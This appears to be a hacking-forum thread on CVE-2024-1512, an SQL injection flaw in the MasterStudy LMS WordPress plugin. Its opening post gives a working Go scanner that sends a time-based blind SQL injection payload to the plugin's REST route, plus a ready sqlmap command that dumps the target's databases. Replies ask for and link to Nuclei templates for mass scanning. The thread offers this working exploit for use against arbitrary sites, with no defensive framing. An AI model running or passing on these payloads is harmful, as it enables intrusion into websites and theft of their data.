Web CVE-2024-1512 [ MasterStudy LMS WordPress Plugin ]

[grozdniyandy]

Blind SQL Injection
Detector:

package main

import (
    "crypto/tls"
    "fmt"
    "net/http"
    "net/url"
    "os"
    "time"
)

func main() {
    if len(os.Args) < 2 {
        fmt.Println("Usage: go run main.go http://example.com")
        os.Exit(1)
    }

    baseURL := os.Args[1]

    query1 := "/?rest_route=/lms/stm-lms/order/items&author_id=111&user="
    query2 := "1) AND (SELECT 1 FROM (SELECT sleep(5))AA"
    encodedQuery := url.QueryEscape(query2)

    fullURL := baseURL + query1 + encodedQuery
    fmt.Println(fullURL)

    http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}

    client := &http.Client{
        Timeout: 100 * time.Second,
    }

    startTime := time.Now()

    resp, err := client.Get(fullURL)
    if err != nil {
        fmt.Printf("Error making request: %v\n", err)
        os.Exit(1)
    }
    defer resp.Body.Close()

    responseTime := time.Since(startTime)

    if responseTime >= 5*time.Second {
        fmt.Printf("Success: %s | Response Time:%s\n", baseURL, responseTime)
    } else {
        fmt.Printf("Fail: %s | Response Time:%s\n", baseURL, responseTime)
    }
}

Exploit:

sqlmap -u 'http://example.com/?rest_route=/lms/stm-lms/order/items&author_id=111&user=555' --dbs --batch  -p user

 

[att4ck]

cool

 

[Focus17]

поделитесь шаблоном нуклеи

 

[xxxx]

поделитесь шаблоном нуклеи

Mynuclei-template/Wordpress/CVE-2024-1512-WordPress-Plugin-MasterStudy-LMS-SQLi.yaml at main · JJThome/Mynuclei-template

自己写的一些漏洞poc. Contribute to JJThome/Mynuclei-template development by creating an account on GitHub.

github.com

nuclei-wordfence-cve/nuclei-templates/2024/CVE-2024-1512-68a7a6679241eb413c9a3d16db5e4d8f.yaml at main · topscoder/nuclei-wordfence-cve

The EXCLUSIVE Collection of 36,000+ Nuclei templates based on Wordfence intel. Daily updates for bulletproof WordPress security. - topscoder/nuclei-wordfence-cve

github.com